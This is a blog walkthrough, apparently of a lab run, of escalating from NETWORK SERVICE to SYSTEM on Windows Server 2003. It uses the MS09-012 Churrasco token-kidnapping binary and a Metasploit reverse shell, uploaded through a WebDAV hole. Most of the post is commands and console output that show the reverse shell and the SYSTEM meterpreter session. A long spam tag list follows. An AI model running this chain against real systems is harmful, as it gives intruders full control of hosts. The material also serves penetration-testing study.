Playing with the MS09-012 Windows Local Exploit

Back in 09 there was a buzz about token kidnapping by Argeniss
http://www.argeniss.com/research.html

http://www.argeniss.com/research/TokenKidnapping.pdf

subsequently patched http://www.microsoft.com/technet/security/bulletin/MS09-012.mspx

I'm normally violently against uploading binaries to boxes but until the local exploit functionality is added to msf...

The gist is you an run the Churrasco binary and it will execute a command for you as SYSTEM from NETWORK SERVICE (the shell privs you get when exploiting IIS). See the slides for more.

Lets see it in action.

We have our network service shell, push up our churrasco binary, metasploit payload, and run it.

*I had issues on my VM getting staged payloads in msf to run, so I opted for a shell/reverse_tcp and then tried to upgrade the shell to meterpreter.

[*] Meterpreter session 3 opened (192.168.6.94:443 -> 192.168.6.94:62700)

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > pwd
c:\windows\system32\inetsrv
Upload the exploit binary and your reverse shell binary. I used the webdav vuln that got me on the box to upload it as churrasco.bin, network service is weird about where it can write to, but it should be writable somewhere if you don't have the file upload route.
meterpreter > shell
Process 3872 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\windows\system32\inetsrv>cd C:\Inetpub\wwwroot
C:\Inetpub\wwwroot>dir
dir
Volume in drive C has no label.
Volume Serial Number is F48F-220E

Directory of C:\Inetpub\wwwroot

05/10/2010 06:53 AM .
05/10/2010 06:53 AM ..
05/10/2010 06:53 AM 410,624 Churrasco.bin
02/21/2003 06:48 PM 1,433 iisstart.htm
05/10/2010 07:19 AM 37,888 shell.bin
05/10/2010 07:43 AM 173 test4.asp;.txt
4 File(s) 2,105,685 bytes
2 Dir(s) 36,227,641,344 bytes free
Let's run the exploit and have it kick off our reverse shell back to us. Set up the multi/handler... blah blah
C:\Inetpub\wwwroot>Churrasco.bin shell.bin
Churrasco.bin shell.bin
/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 668
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 672
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 676
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 680
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x730
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found NETWORK SERVICE Token
/churrasco/-->Found LOCAL SERVICE Token
/churrasco/-->Found SYSTEM token 0x728
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM
on the multi/handler side...
[*] Command shell session 1 opened (192.168.6.94:443 -> 192.168.6.94:62854)


(C) Copyright 1985-2003 Microsoft Corp.

C:\Inetpub\wwwroot>whoami
whoami
nt authority\system

C:\Inetpub\wwwroot>^Z
Background session 1? [y/N] y
msf exploit(handler) > sessions -u 1
msf exploit(handler) > [*] Meterpreter session 2 opened (192.168.6.94:443 -> 192.168.6.94:62855)

msf exploit(handler) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 shell Microsoft Windows [Version 5.2.3790] 192.168.6.94:443 -> 192.168.6.94:62854
2 meterpreter NT AUTHORITY\SYSTEM @ LAB 192.168.6.94:443 -> 192.168.6.94:62855

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

0 komentar:

Posting Komentar

Sale! $7.49.com domains at GoDaddy.com - 468x60
o o

Label

portable Internet teaching and learning Top Great Wallpaper Portable software repair word file book reviews download free Portable software Computer others Web software portable word fix word recovery worldwide Antivirus Business Creative teaching Pentesting Windows Big Picture Indonesia Metasploit MS Word Personalized Learning Threats computer forensics Action Plans and Lessons Blog Business Success Radio Blog Talk Radio Blogger Hack change free portable Blogging Leadership free inquiry learning project based learning shortcuts tricks AntiSpam Asia Identity Safe Internet Security Rants and Raves Widgets anti-virus protection doc repair Converter Creative Schools Integrated Learning Menu Ministry NZCurric Network Online Business PDF Report android formulas game global log analysis software virtual assistant work at home Comments Compression Creative teaching Educationalists Google Image Microsoft Mp3 Player Tips Viewer charts exploits formatting gynaecology interviews national standards obstetrics paediatrics perl phishing stellar word repair AV-Test Audio Blog Service Blogger Chrome Creativity DVD Domain Facebook Features Firefox History Language Microsoft Office portable Multimedia NOD32 portable ORTHOPEDICS Online Glossary PHYSIOLOGY Portable Antivirus Portable NOD32 Reader Scan Service State Template Traceroute VPN Video Videos Viruses Vulnerability Web Design antivirus portable customizing eBay free mp3 lookup mp3 download office outlook web access owa printing proxy site rapidshare what are you missing what did they take word recovery tool word repair file 10X 2010 20800mah 2Step 3 A$AP Rocky ANATOMY Access Advanced Uninstaller Akiko Alexa America American Express Animation Anonymous Anyone Apple Safari 3.1.1 Portable Arrington BCBS of TN Backspin Backups Banshee Best Passwords Billiards Blackberry Blog Jet Blog Jet portable CD/DVD Burn Charger Chat Collection Competition Computer viruses Corel Draw X4 Portable Creepy DDoS Desktop Development Dictionary Download free Portable Downloads Drives E N T Educationalists Enable Entertainment Excel FOLLOW ME FORENSIC MEDICINE Fire TV Stick Flashget 1.8 Freeware Full Scope Testing GENERAL MEDICINE Geolocation Giveaway Graphic HEMATOLOGY HTML HTML5 Hacked I C U INTERNAL MEDICINE IPv6 Insight Intelligent Charging. 6.6A/33W. Aluminum 3 USB Car Power Adapter Internet chat messenger Linux LoveWallpapers2010 MICROBIOLOGY Maya Complete Maya Unlimited 2008 Metasploit Pro Michael Microsoft portable Microsoft word portable Mini PC Money Monitoring Most Most Power Car Charger Motivation Mozilla Mozilla Firefox v3.0 Portable Mozilla Firefox Portable Edition v3.0 NEURO MEDICINE NOD32 Norton Account ONCOLOGY Offers Office portable 2010 Online Video Other PATHOLOGY PBS Newhour PDF 2 office PDF to Office PDF2Office portable Paperback Podcasts Portable Adobe Illustrator CS5 Portable All Office Converter Pro 4.0 Portable Blog Jet v.2.0.0.7 Portable Charger Portable USB Portable USB Disk Security Portable USB Disk Security 5.0.0.80 Portable free software Power Bank PowerDVD 8 Deluxe Portable PowerDVD Portable Printer Problems Product Key Product Tutorials Programing Proxy server Quarantine Quick RADIOLOGY RECOSOFT portable Recover Recover Keys Recovery Remove Right Ripper SANS SEO SMRecorder SURGERY SVDownloader Safe Web Scam Scapy School Vision Scurity Search Selena Gomez Smarphone Smart Powe Social network Solid Solutions Space Spam TRAUMA TV Stick Talent Development ThreatCon Toolbar Total Image Converter v2.0.1.0 Traceroute Visulization Track Twitter UROLOGY Uninstall Uninstaller PRO 9.1 VIROLOGY VNC Verification Wanted Webcams Webcast Webmaster Word 2007 portable XP Repair accessdata adobe portable CS5 adware aix app arrays assassin creeds IV author interviews auxiliary modules available biochemistry blackberry enterprise server business toll free number cd burning coldfusion command corel portable corel x4 portable dashboards data crashes data validation dental download game download software drawing drive crashes efile tax extension email recovery encryption europe external drives faster federal tax return extension filing federal tax extension flashget form 4868 free download portable software free download software portable free portabale software free portable mozilla free software free software portable mozilla ftk 2 functions games graphs green ilustrator CS5 portable information theft innovation iphone jboss lft lnk files log2timeline long distance calls long-distance number love notes maya 2008 maya portable mobile broadband mobile devices more mozilla portable navigation netanalysis news nmap opinion options paid to upload password cracking pc viruses portabel games portabel maya portable ESET portable PDF to Office portable blogjet portable game Backspin Billiards portable rapidshare portable safari portable software Portable Autorun Virus Remover 2.3 portable sofware powerpoint prefetch product proxy list ps3 quick r Tri Port Car Charger record regripper repair doc file research rpcclient safari portable scammers scanning scrap files security software XP Repair Pro 2007 sofware portable free spyware system crashes telecommuter temporary files testing the weeknd times toll-free number travel consultant unicornscan update user assist v3.0.657 virtual assistant directories virtual assistant freelance virtual assistant tool virtual assistants virtual jobs virus definition list web application testing webmail website word portable word repair work from home jobs writers z|| Link Exchange
Toko Kaos Satuan

Product




SUCKSHARE.COM My Zimbio o o